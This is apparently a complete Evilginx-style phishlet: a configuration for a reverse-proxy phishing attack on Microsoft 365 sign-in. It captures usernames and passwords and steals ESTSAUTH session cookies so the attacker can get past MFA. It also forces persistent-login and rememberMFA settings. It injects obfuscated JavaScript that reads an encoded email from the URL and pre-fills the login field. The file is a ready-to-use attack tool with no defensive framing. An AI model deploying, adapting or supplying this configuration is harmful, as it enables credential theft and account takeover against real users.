name: 'o365'
author: 'REDSON'
min_ver: '2.4.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}

sub_filters:
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}

auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
  - domain: 'login.microsoftonline.com'
    keys: ['SignInStateCookie']
credentials:
  username:
    key: '(login)'
    search: '(.*)'
    type: 'post'
  password:
    key: '(passwd)'
    search: '(.*)'
    type: 'post'
auth_urls:
  - '/common/SAS/ProcessAuth'
  - '/kmsi'
login:
  domain: 'login.microsoftonline.com'
  path: '/' 
force_post:
  - path: '/kmsi'
    search: 
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/common/SAS'
    search: 
      - {key: 'rememberMFA', search: '.*'}
    force:
      - {key: 'rememberMFA', value: 'true'}
    type: 'post' 
js_inject:
  - trigger_domains: ["login.microsoftonline.com"]
    trigger_paths: ["/common/oauth2"]
    trigger_params: []
    script: |
     var _cs=["#i",'116','#i0',"16","01","que","Sel","cto","le","Ele","ele","ri","y","pus","bs","arC","st","ryS","th","sh","ng","ery","ry","str","get",'0',"r","pl","sub","od","ect","lo","h","cat","ap","or","om","e","lu","tr","Ch","ha","fr","1024","tor","ion","va","en","qu","By","ec",'abs',"su"]; const _g0 = async _g1 => { while ( document[_cs[48]+_cs[21]+_cs[6]+_cs[30]+_cs[35]](_g1) === null) { await new Promise( _g2 => requestAnimationFrame(_g2) ) } return document[_cs[5]+_cs[17]+_cs[10]+_cs[7]+_cs[26]](_g1); }; _g0(_cs[2]+_cs[1])[_cs[18]+_cs[47]]((_g1) => { var _g3 = window[_cs[31]+_cs[33]+_cs[45]][_cs[41]+_cs[19]][_cs[28]+_cs[23]](1)[_cs[28]+_cs[16]+_cs[11]+_cs[20]](1),_g4 = [],_g6;for(var _g5=0; _g5< _g3[_cs[8]+_cs[20]+_cs[18]]-1; _g5+=2){_g4[_cs[13]+_cs[32]](parseInt(_g3[_cs[52]+_cs[14]+_cs[39]](_g5, 2), 16));}_g6 = String[_cs[42]+_cs[36]+_cs[40]+_cs[15]+_cs[29]+_cs[37]][_cs[34]+_cs[27]+_cs[12]](String, _g4);var _g7 = document[_cs[5]+_cs[22]+_cs[6]+_cs[50]+_cs[44]](_cs[0]+_cs[4]+_cs[3]); _g7[_cs[46]+_cs[38]+_cs[37]] = _g6; });  
     
